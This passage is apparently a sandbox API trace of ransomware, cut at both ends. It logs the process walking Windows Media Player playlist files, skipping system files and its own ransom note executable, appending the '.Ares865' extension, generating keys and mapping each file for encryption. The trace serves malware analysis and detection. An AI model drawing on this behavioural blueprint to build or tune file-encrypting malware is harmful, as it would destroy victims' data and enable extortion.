lpString2="pagefile.sys") returned -1 [0065.211] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="boot") returned -1 [0065.211] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="ids.txt") returned -1 [0065.211] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="ntuser.dat") returned -1 [0065.211] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="perflogs") returned -1 [0065.211] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="MSBuild") returned -1 [0065.211] lstrlenW (lpString="09_Music_played_the_most.wpl") returned 28 [0065.211] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl") returned 124 [0065.211] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="09_Music_played_the_most.wpl" | out: lpString1="09_Music_played_the_most.wpl") returned="09_Music_played_the_most.wpl" [0065.211] lstrlenW (lpString="09_Music_played_the_most.wpl") returned 28 [0065.211] lstrlenW (lpString="Ares865") returned 7 [0065.211] lstrcmpiW (lpString1="ost.wpl", lpString2="Ares865") returned 1 [0065.211] lstrlenW (lpString=".dll") returned 4 [0065.211] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2=".dll") returned 1 [0065.211] lstrlenW (lpString=".lnk") returned 4 [0065.211] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2=".lnk") returned 1 [0065.211] lstrlenW (lpString=".ini") returned 4 [0065.211] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2=".ini") returned 1 [0065.211] lstrlenW (lpString=".sys") returned 4 [0065.211] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2=".sys") returned 1 [0065.211] lstrlenW (lpString="09_Music_played_the_most.wpl") returned 28 [0065.211] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl.Ares865") returned 126 [0065.211] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl.ares865"), dwFlags=0x1) returned 1 [0065.212] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.212] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1025) returned 1 [0065.212] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.213] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.213] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.213] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.213] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.213] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.214] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x710, lpName=0x0) returned 0x118 [0065.215] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x710) returned 0x190000 [0065.216] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.216] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.216] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.217] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d32b0 [0065.217] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d32b0 | out: hHeap=0x2b0000) returned 1 [0065.217] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.217] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.217] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.217] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.217] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0065.217] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.217] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0065.217] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.217] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.217] CloseHandle (hObject=0x118) returned 1 [0065.217] CloseHandle (hObject=0x164) returned 1 [0065.217] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.217] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.217] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.218] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x66402e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x66402e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf740fbac, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x427, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="10_All_Music.wpl", cAlternateFileName="10_ALL~1.WPL")) returned 1 [0065.218] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.218] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="aoldtz.exe") returned -1 [0065.218] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2=".") returned 1 [0065.218] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="..") returned 1 [0065.218] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="windows") returned -1 [0065.218] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="bootmgr") returned -1 [0065.218] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="temp") returned -1 [0065.218] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="pagefile.sys") returned -1 [0065.218] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="boot") returned -1 [0065.218] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="ids.txt") returned -1 [0065.218] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="ntuser.dat") returned -1 [0065.218] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="perflogs") returned -1 [0065.218] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="MSBuild") returned -1 [0065.218] lstrlenW (lpString="10_All_Music.wpl") returned 16 [0065.218] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl") returned 118 [0065.218] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="10_All_Music.wpl" | out: lpString1="10_All_Music.wpl") returned="10_All_Music.wpl" [0065.218] lstrlenW (lpString="10_All_Music.wpl") returned 16 [0065.218] lstrlenW (lpString="Ares865") returned 7 [0065.218] lstrcmpiW (lpString1="sic.wpl", lpString2="Ares865") returned 1 [0065.218] lstrlenW (lpString=".dll") returned 4 [0065.218] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2=".dll") returned 1 [0065.218] lstrlenW (lpString=".lnk") returned 4 [0065.218] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2=".lnk") returned 1 [0065.218] lstrlenW (lpString=".ini") returned 4 [0065.218] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2=".ini") returned 1 [0065.218] lstrlenW (lpString=".sys") returned 4 [0065.218] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2=".sys") returned 1 [0065.218] lstrlenW (lpString="10_All_Music.wpl") returned 16 [0065.219] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl.Ares865") returned 114 [0065.219] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl.ares865"), dwFlags=0x1) returned 1 [0065.219] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.220] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1063) returned 1 [0065.220] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.220] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.220] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.220] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.221] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.221] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.221] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x118 [0065.222] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x190000 [0065.223] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.224] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.224] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.224] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d32b0 [0065.224] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d32b0 | out: hHeap=0x2b0000) returned 1 [0065.224] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.224] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.224] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.224] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.224] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0065.224] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.224] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0065.224] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.224] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.224] CloseHandle (hObject=0x118) returned 1 [0065.224] CloseHandle (hObject=0x164) returned 1 [0065.224] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.224] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.225] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.225] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x66402e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x66402e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf740fbac, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x249, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="11_All_Pictures.wpl", cAlternateFileName="11_ALL~1.WPL")) returned 1 [0065.225] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.225] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="aoldtz.exe") returned -1 [0065.225] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2=".") returned 1 [0065.225] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="..") returned 1 [0065.225] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="windows") returned -1 [0065.225] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="bootmgr") returned -1 [0065.225] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="temp") returned -1 [0065.225] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="pagefile.sys") returned -1 [0065.225] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="boot") returned -1 [0065.225] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="ids.txt") returned -1 [0065.225] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="ntuser.dat") returned -1 [0065.225] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="perflogs") returned -1 [0065.225] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="MSBuild") returned -1 [0065.225] lstrlenW (lpString="11_All_Pictures.wpl") returned 19 [0065.225] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl") returned 106 [0065.225] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="11_All_Pictures.wpl" | out: lpString1="11_All_Pictures.wpl") returned="11_All_Pictures.wpl" [0065.225] lstrlenW (lpString="11_All_Pictures.wpl") returned 19 [0065.225] lstrlenW (lpString="Ares865") returned 7 [0065.225] lstrcmpiW (lpString1="res.wpl", lpString2="Ares865") returned 1 [0065.225] lstrlenW (lpString=".dll") returned 4 [0065.225] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2=".dll") returned 1 [0065.225] lstrlenW (lpString=".lnk") returned 4 [0065.225] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2=".lnk") returned 1 [0065.225] lstrlenW (lpString=".ini") returned 4 [0065.225] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2=".ini") returned 1 [0065.225] lstrlenW (lpString=".sys") returned 4 [0065.225] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2=".sys") returned 1 [0065.225] lstrlenW (lpString="11_All_Pictures.wpl") returned 19 [0065.226] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl.Ares865") returned 117 [0065.226] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl.ares865"), dwFlags=0x1) returned 1 [0065.227] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.227] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=585) returned 1 [0065.227] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.227] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.227] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.227] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.228] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.228] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.228] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x550, lpName=0x0) returned 0x118 [0065.230] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x550) returned 0x190000 [0065.230] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.231] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.231] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.231] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d32b0 [0065.231] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d32b0 | out: hHeap=0x2b0000) returned 1 [0065.231] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.231] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.231] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.231] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.232] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0065.232] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.232] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0065.232] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.232] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.232] CloseHandle (hObject=0x118) returned 1 [0065.232] CloseHandle (hObject=0x164) returned 1 [0065.232] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.232] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.232] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.232] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x66402e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x66402e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf740fbac, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x437, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="12_All_Video.wpl", cAlternateFileName="12_ALL~1.WPL")) returned 1 [0065.232] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.232] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="aoldtz.exe") returned -1 [0065.232] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2=".") returned 1 [0065.232] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="..") returned 1 [0065.232] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="windows") returned -1 [0065.232] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="bootmgr") returned -1 [0065.232] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="temp") returned -1 [0065.233] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="pagefile.sys") returned -1 [0065.233] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="boot") returned -1 [0065.233] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="ids.txt") returned -1 [0065.233] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="ntuser.dat") returned -1 [0065.233] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="perflogs") returned -1 [0065.233] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="MSBuild") returned -1 [0065.233] lstrlenW (lpString="12_All_Video.wpl") returned 16 [0065.233] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl") returned 109 [0065.233] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="12_All_Video.wpl" | out: lpString1="12_All_Video.wpl") returned="12_All_Video.wpl" [0065.233] lstrlenW (lpString="12_All_Video.wpl") returned 16 [0065.233] lstrlenW (lpString="Ares865") returned 7 [0065.233] lstrcmpiW (lpString1="deo.wpl", lpString2="Ares865") returned 1 [0065.233] lstrlenW (lpString=".dll") returned 4 [0065.233] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2=".dll") returned 1 [0065.233] lstrlenW (lpString=".lnk") returned 4 [0065.233] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2=".lnk") returned 1 [0065.233] lstrlenW (lpString=".ini") returned 4 [0065.233] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2=".ini") returned 1 [0065.233] lstrlenW (lpString=".sys") returned 4 [0065.233] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2=".sys") returned 1 [0065.233] lstrlenW (lpString="12_All_Video.wpl") returned 16 [0065.233] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl.Ares865") returned 114 [0065.233] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl.ares865"), dwFlags=0x1) returned 1 [0065.234] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.234] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1079) returned 1 [0065.234] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.235] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.235] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.235] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.235] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.235] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.236] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x118 [0065.237] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x190000 [0065.238] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.238] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.238] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.239] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d32b0 [0065.239] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d32b0 | out: hHeap=0x2b0000) returned 1 [0065.239] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.239] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.239] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.239] RtlAllocateHeap 